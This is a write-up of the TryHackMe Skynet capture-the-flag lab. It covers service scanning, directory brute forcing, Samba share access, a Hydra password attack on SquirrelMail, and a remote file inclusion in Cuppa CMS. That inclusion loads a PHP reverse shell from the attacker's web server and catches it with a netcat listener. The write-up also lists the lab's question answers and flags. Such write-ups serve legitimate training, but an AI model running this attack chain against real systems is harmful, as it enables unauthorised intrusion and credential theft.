Complete TryHackMe SkyNet WriteUp

TryHackMe Skynet is a vulnerable Terminator themed Linux machine created to test our penetration testing knowledge in network scanning, enumeration, attack samba share, RFI attacks and privilege escalation.

TreyHackMe SkyNet WriteUp
TryHackMe SkyNet WriteUp

Start the Machine

Before everything we need to start our machine and wait around a minute to start our recon phase. After the machine is up and running it’s time to scan the box.

Scan the Target Machine

To scan our machine I will use Nmap with a few arguments to detect the service versions on all ports.

nmap -sV -sC -A -p- 10.10.131.16

Analyse Nmap Scan results

After running the nmap scan I notice a few open ports and four main services – SSH , Apache, Dovecot, Samba.

Complete TryHackMe SkyNet WriteUp
tryhackme nmap scan skynet
  • 22/tcp SSH
  • 80/tcp HTTP
  • 110/tcp POP3
  • 139/tcp NetBIOS Samba
  • 143/tcp IMAP
  • 445/tcp NetBIOS Samba

Investigate Port 80 Apache/2.4.18

Open you browser with your Skynet Box IP and a skynet dummy search engine appear

Complete TryHackMe SkyNet WriteUp
TryHackMe Skynet Writeup Port 80 Dummy Search engine

I have tried search something but nothing happen. Analyzing the HTML code I can’t find nothing relevant!

Complete TryHackMe SkyNet WriteUp
html code

At this point we get nothing from the Webserver it’s time to search some folders and find something useful to explore.

Execute gobuster

To find new folders on the webserver I will use gobuster with a public list.

gobuster dir -u http://10.10.131.16 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50
Complete TryHackMe SkyNet WriteUp
Complete TryHackMe SkyNet WriteUp 58

After running the gobuster we got some useful folders to investigate but only one can be open, the squirrelmail folder!

Info to Explore

  • folder squirrelmail

Investigate Dovecot

Open the browser and access the squirrelmail folder it will open a login page and show us the SquirrelMail version 1.4.23

http://10.10.131.16/squirrelmail
TryHackMe SkyNet Squirrelmail
TryHackMe SkyNet Squirrelmail

At this point we have the version of squirrel service and a login page but no clue of any username or email I’ve try some basic SQLi but without success. It’s time try the next service available Samba.

Investigate Samba

To investigate the Samba service I usually use the SMBMap tool or Nmap.

smbmap -H 10.10.131.16
Complete TryHackMe SkyNet WriteUp
SMBMap skynet

After executing smbmap we got some juicy info, we can Read the anonymous share and there is a interesting share with the name milesdyson but we don’t have access to it.

Wait? milesdyson sound like a username for me, maybe can be used on Squirrelmail login page. keep it in mind for now I will investigate the anonymous share maybe I can find some useful file.

Connect to anonymous Share

For now let’s connect to the anonymous share with SMBClient using the command:

smbclient //10.10.131.16/anonymous

We are in let’s list the files available and search…

Complete TryHackMe SkyNet WriteUp
Anonyous share output

We have one file and one folder to investigate.

cat attention.txt
Complete TryHackMe SkyNet WriteUp
attention.txt file output

We can confirm our suspects the user Miles Dyson exists.

Complete TryHackMe SkyNet WriteUp
log1.txt output

Log1.txt file looks like a password list file and maybe can be used as a wordlist to bruteforce the squirrelemail login page, let’s try it.

Brute force Squirrel login with Hydra

Here we will test the milesdyson as username a log1.txt file as a wordlist.

hydra -l milesdyson -P log1.txt 10.10.131.16 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Something is incorrect." -V -F -u
Complete TryHackMe SkyNet WriteUp
Brute force Squirrel login

After a successful brute force attack against squirrel we can login with user milesdyson and password cyborg007haloterminator

Complete TryHackMe SkyNet WriteUp
Squirrel Dashboard

Open first email and extract Samba password

Complete TryHackMe SkyNet WriteUp
TryHackMe Skynet Samba Password

Connect to milesdyson Share

smbclient //10.10.131.16/milesdyson -U milesdyson

Insert the Password-> )s{A&2Z=F^n_E.B`
Complete TryHackMe SkyNet WriteUp
Read Samba Share MilesDyson
Complete TryHackMe SkyNet WriteUp

Only PDF files and a folder called notes let’s list it

Complete TryHackMe SkyNet WriteUp

One file looks interesting important.txt

Complete TryHackMe SkyNet WriteUp
Complete TryHackMe SkyNet WriteUp
read important.txt file

The important.txt file mention some new directory /45kra24zxs28v3yd open it and we have the Miles Dyson homepage.

Complete TryHackMe SkyNet WriteUp
Miles Dyson Personal Page

gobuster o find this administrator page

gobuster dir -u http://10.10.131.16/45kra24zxs28v3yd -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50
Complete TryHackMe SkyNet WriteUp
Complete TryHackMe SkyNet WriteUp 59
Open http://10.10.131.16/45kra24zxs28v3yd/administrator
Complete TryHackMe SkyNet WriteUp

Cuppa CMS Exploit

Find some useful exploit to run on Cuppa CMS

searchsploit cuppa
Complete TryHackMe SkyNet WriteUp
Cuppa CMS Exploit

Select Reverse Shell

Here I will copy the PHP Reverse Shell into my homefolder and then start a python webserver to

cp /usr/share/webshells/php/php-reverse-shell.php ~

Change the webshell values IP and Port if needed.

Complete TryHackMe SkyNet WriteUp
Edit PHP reverse Shell
cd /home/user
python3 -m http.server 801
http://10.10.131.16/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.153.122:801/php-reverse-shell.php

Open a new terminal and use netcat or metasploit o listen on port 1234

nc -l 1234
cd milesdyson
cat user.txt
Complete TryHackMe SkyNet WriteUp

Our session is limited to the user webserver is running www-data, we need to find a way to elevate privileges but before that let’s brute force the Samba share milesdyson.

Brute Force Samba Service

hydra -l milesdyson -P log1.txt 10.10.131.16 smb -V

No success brute forcing the milesdyson share, OK let’s be more intrusive.

Privilege Escalation

Using Exploit

Search exploit to out kernel version

searchsploit kernel 4.8.0
Complete TryHackMe SkyNet WriteUp
search kernel exploit
Complete TryHackMe SkyNet WriteUp
Complete TryHackMe SkyNet WriteUp 60

Using Crontab

Root Flag

cat /root/root.txt

Answer Questions

Now its time to answer the CTF questions

Skynet Questions
Skynet Questions

What is Miles password for his emails?

cyborg007haloterminator

What is the hidden directory?

/45kra24zxs28v3yd

What is the vulnerability called when you can include a remote file for malicious purposes?

remote file inclusion

What is the user flag?

7ce5c2109a40f958099283600a9aeXXX

What is the root flag?

3f0372db24753accc7179a282cd6aXXX

Linux Kernel 4.8.0 UDEV < 232 – Local Privilege Escalation

Register TryHackMe HERE

Related Posts

Index